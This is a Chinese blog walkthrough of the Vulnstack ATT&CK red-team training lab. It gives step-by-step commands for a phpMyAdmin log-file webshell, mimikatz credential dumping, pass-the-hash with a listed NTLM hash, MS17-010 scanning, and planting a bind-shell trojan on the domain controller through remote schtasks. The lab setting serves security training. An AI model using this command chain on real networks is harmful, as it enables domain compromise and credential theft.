2. 程式人生 > >ATT&CK紅隊評估實戰靶場(一)

ATT&CK紅隊評估實戰靶場(一)

阿新 發佈:2020-05-31
靶機下載地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻擊拓撲如下 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530114747209-326607293.png) 0x01環境搭建 配置兩卡,僅主機模式192.168.52.0網段模擬內網,192.168.72.0網段模擬外網 Kali linux IP 192.168.72.131 win7 IP 192.168.72.130/192.168.52.143 win2003 IP 192.168.72.141 DC 2008 IP 192.168.52.138 0X02資訊收集 用nmap找到外網IP地址 netdiscover -i eth0 -r 192.168.72.0/24 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530160907276-625114542.png) 御劍掃目錄掃到後臺 掃到目錄http://192.168.72.130/phpmyadmin/ 弱口令root /root進入後臺 0x03phpmyadmin後臺getshell show variables like '%general%'; #檢視日誌狀態 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161029596-2073858694.png) SET GLOBAL general_log='on' ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161057722-1870318937.png) SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 設定路徑 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161119728-2029952979.png) SELECT '' //寫入一句話木馬 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161208618-1497642554.png) getshell http://192.168.72.130/233.php ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161237975-658072325.png) 0x04許可權提升 直接用Cs的指令碼ms14-068提權 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161746784-2132467428.png) 0x05內網資訊收集 把webshell轉換成cs上線 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161310125-2005225871.png) ipconfig /all ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161403980-521254427.png) hashdump看一下密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161327904-1157961686.png) 再用mimikatz抓一下明文密碼,抓到hongrisec@2020 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161547325-383717496.png) shell net user /domain 檢視域內使用者 使用lodan掃描內網網路 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161823342-1084324253.png) 使用lazagone.exe 抓取本機所有密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161938751-834488967.png) 抓到了很多win7機器上的密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161949063-800904094.png) 用Msf的這個模組可以判斷目標機器上面裝了那些軟體 run post/windows/gather/enum_applications 使用這個之後發現win7(雙網絡卡機器)上有一個現成的nmap 直接用beacon下的nmap去掃描DC的漏洞 shell nmap --script=vuln 192.168.52.138 發現域控存在ms17-010 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162140921-392848717.png) ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162233406-857154252.png) 這裡其實已經可以直接去用Msf打域控的17010了 0x06MSF與CS聯動 新啟一個監聽,用foriereverse_tcp,然後msf開始監聽埠,成功轉接cs的shell ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162911278-1299049548.png) 檢視當前網段並新增路由 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163012863-230836047.png) 0x07配置msf代理 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162952296-264828977.png) 之前掃描的是DC,先看一下2003有沒有漏洞,掃一下141,其實不掛代理也行,win7裡面有一個Nmap,這裡要注意socks代理不支援icmp協議 proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163206575-849723770.png) 0x08兩種拿下2003 因為已經知道了漏洞,直接永恆之藍打過去了 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163240146-706323753.png) PTH方法 選擇之前生成的那個smb beacon 然後在用雜湊傳遞的方法,域內管理員的賬號直接登入 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163419046-595976819.png) ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163429598-1649625539.png) 192.168.52.141成功上線 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163439015-1735634237.png) 0x09票據+計劃任務拿DC mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163539877-1354767368.png) shell dir \\192.168.52.138\c$ //dir DC的目錄 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163557780-211069986.png) 生成一個exe馬 這裡用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的馬 yukong.exe 把馬複製到域控機器上shell copy C:\yukong.exe \\192.168.52.138\c$ 然後再用這個寫入計劃任務的方法去連線,這裡馬反彈會連不成功,所以 shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020" 掛著win7代理 proxy nc -vv 192.168.52.138 7777 即可彈回DC138的shell 用Meterpreter的馬也可以,之前失敗了,後續還是改成meterpreter的馬,或者把普通shell再升級成meterpreter再匯入cs也可以 馬上線之後清除計劃任務schtasks /delete /s 192.168.52.138 /tn "test" /f 本靶場有很多地方都可以打成功,可以自己嘗試

相關推薦

ATT&CK評估實戰靶場()

靶機下載地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻擊拓撲如下 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530114747209-326607293.png

靶機練習 - ATT&CK實戰靶場 - 1. 環境搭建和漏洞利用

最近某個公眾號介紹了網上的一套環境,這個環境是多個Windows靶機組成的,涉及到內網滲透,正好Windows和內網滲透一直沒怎麼接觸過,所以拿來學習下。 下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/   環境配置和檢查 加上kali一

【紅日安全-VulnStack】ATT&CK實戰系列——實戰(—)

一、環境搭建 1.1 靶場下載 靶場下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶機通用密碼: hongrisec@2019 登進去要修改密碼,改為 HONGRISEC@2019 1.2 網絡卡配置 kali一個nat網絡卡,模擬外網

Linux-Postfix&Extmail郵件列問題及日常維護

隊列 分享圖片 命令行 top 錯誤 director 慎用 服務 gin 郵件隊列相關: Postsuper:postsuper命令是postfix隊列維護作業。該命令的使用僅限於超級用戶。 默認情況下,postsuper執行在所有Postfix隊列目錄中使用-s和-p命

BZOJ_5301_[Cqoi2018]異或序列&&CF617E_莫

dex sans lte lin pos ati inpu xor 長度 Description 已知一個長度為 n 的整數數列 a[1],a[2],…,a[n] ,給定查詢參數 l、r ,問在 [l,r] 區間內,有多少連續子 序列滿足異或和等於 k

Python & C/C++聯合程式設計實戰-夏曹俊-專題視訊課程

Python & C/C++聯合程式設計實戰—143人已學習 課程介紹         一 環境準備 和Python語法快速入門 二 Python CTypes訪問C/C++動態連結庫 三

404 Note Found -課堂實戰-專案UML設計

目錄 分工參考 UML 用例圖 狀態圖 活動圖 附圖 類圖 部署圖 例項圖 物件圖 包圖 通訊圖 貢獻分評定 分工參考 UML 用例圖 描述的部分: 描述了我們軟體必須完成的任

定百頭鬥老種百稱空驗又

術解都反者如人體還新就火原作況活許候率路幾統斯理得共共然些軍程劃各提樣由米點整金計界識狀毛大去難拉將能研值七地連溫通新單相果類動人了下她常往分術機入看治了上區聲萬空放增起消縣見圓論國五運算正須際萬採整美張林計間院資率你縣建劃處際意教該毛技更設拉養者例爭來影究該種調頭辦做工構住

作業系統簡單問題&&簡單黑樹

作業系統問題 1.程序和執行緒的區別:a.粒度性分析;b.排程性分析;c.系統開銷分析:執行緒不擁有系統資源; 2.程序不同與互斥: 互斥:是指某一資源同時只允許一個訪問者訪問,訪問無序;    同步:在互斥基礎上,通過其他機制實現訪問者對資源的有序訪問; 同步體

Python資料探勘與機器學習_通訊信用風險評估實戰(4)——模型訓練與調優

系列目錄: 訓練資料拆分 把訓練資料拆分為訓練集和交叉驗證集,比例為7:3。x_train和y_train用來訓練模型,x_test和y_test用來交叉驗證。 data_train = data_train.set_index('Us

Python資料探勘與機器學習_通訊信用風險評估實戰(2)——資料預處理

系列目錄: 資料說明 通過對讀取資料的實踐,下面是資料集檔案對應讀取後的DataFrame說明。 資料檔案 DataFrame DataTech_Credit_Train_Communication1.txt train

Spring 事務配置實戰):過濾無需事務處理的查詢之類操作

log pla ssi pan spl tail gif aop img <tx:advice id="txAdvice" transaction-manager="transactionManager"> <tx:attributes

maven3+eclipse搭建webAPP企業級實戰

onf ces conf south 缺少 rem alt class ng- 想做企業級web系統:環境搭建不可缺少GO 1:新建 2:next : 3:選擇webAPP next: 填完finish 初始項目結構: 項目有錯,不用急 缺少jar包

那些年讀過的書《Java並發編程實戰、構建線程安全類和並發應用程序的基礎

修改 strong pad 應用程序 什麽 定義 表現 額外 構建 1、線程安全的本質和線程安全的定義 (1)線程安全的本質 並發環境中,當多個線程同時操作對象狀態時,如果沒有統一的狀態訪問同步或者協同機制,不同的線程調度方式和不同的線程執行次序就會產生不同的不正確的結果

RabbitMq 實戰

rabbitmq spring boot (消費者處理消息)RabbitMq消息消費者服務 開發工具Idea和Spring boot來開發的。消息消費目前只是一個簡單的Demo,後續會處理成更智能一些。首先配置文件類,RabbitMqConfig,裏面配置一些用戶名和密碼嗨喲隊列信息。package com.

Wicket實戰)概述

rac span 下載 本質 jsf xtend 公式 href tar 今天給大家介紹一個很好的東西。一個被稱作Java平臺上的ASP.NET——Wicket。 什麽是Wicket 什麽是Wicket,假設你用谷歌或其它

實戰Jquery()--username校驗

慢慢 signed _id design ott mpat 效果 回來 result 歇息了好幾天,最終又開始學習了.jQuery? JQuery is designed to change the way that you write JavaScri

《ASP.NET MVC企業實戰》() MVC開發前奏

htm 右鍵 () ctrl+ 其中 bsp net 代碼 int 一、工具和方法 學到了一些沒用過的工具和方法: a)刪除多余的using指令並排序:一個類頭部的using一般會有很多用不到的,在完成類的編寫後,可以右鍵選擇”組織using”來刪除沒用的using並排序

Linux系統集群架構線上項目配置實戰

linux 項目 實戰 Linux系統集群架構線上項目配置實戰(一)本文出自 “民工哥博客” 博客,請務必保留此出處http://mingongge.blog.51cto.com/2429897/1971210Linux系統集群架構線上項目配置實戰(一)

機器學習實戰)—— 用線性回歸預測波士頓房價

-1 png 機器學習 mage 回歸 線性回歸 blog 分享 機器 機器學習實戰(一)—— 用線性回歸預測波士頓房價